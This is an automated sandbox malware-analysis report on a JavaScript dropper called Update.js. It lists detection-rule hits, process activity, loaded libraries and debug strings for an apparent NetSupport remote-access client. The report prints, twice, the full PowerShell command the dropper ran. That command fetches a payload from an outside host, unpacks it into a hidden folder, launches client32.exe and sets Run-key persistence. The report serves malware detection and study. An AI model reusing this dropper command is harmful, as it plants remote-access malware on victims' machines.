                                Source: amsi64_7024.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: sslproxydump.pcap, type: PCAPMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: Process Memory Space: wscript.exe PID: 7024, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: Process Memory Space: powershell.exe PID: 6704, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: classification engineClassification label: mal100.rans.troj.expl.evad.winJS@6/28@2/3
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1105A760 GetLastError,FormatMessageA,LocalFree,10_2_1105A760
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,10_2_1109D860
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,10_2_1109D8F0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,10_2_11116880
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11089430 FindResourceA,LoadResource,LockResource,10_2_11089430
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,10_2_11128B10
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6712:120:WilError_03
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_febnwrhp.qfn.ps1Jump to behavior
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe "C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe "C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe" Jump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\NSM.iniJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                Source: Update.jsStatic file information: File size 4053374 > 1048576
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dllJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2533582731.000000006CCA1000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2538791982.00000000747F2000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 0000000A.00000002.2489223815.0000000000442000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000A.00000000.1514998417.0000000000442000.00000002.00000001.01000000.00000008.sdmp, client32.exe.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2538169520.0000000073A85000.00000002.00000001.01000000.0000000A.sdmp, pcicapi.dll.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr

                                Data Obfuscation

                                barindex
                                Found suspicious powershell code related to unpacking or dynamic code loading
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Conta
                                Suspicious powershell command line found
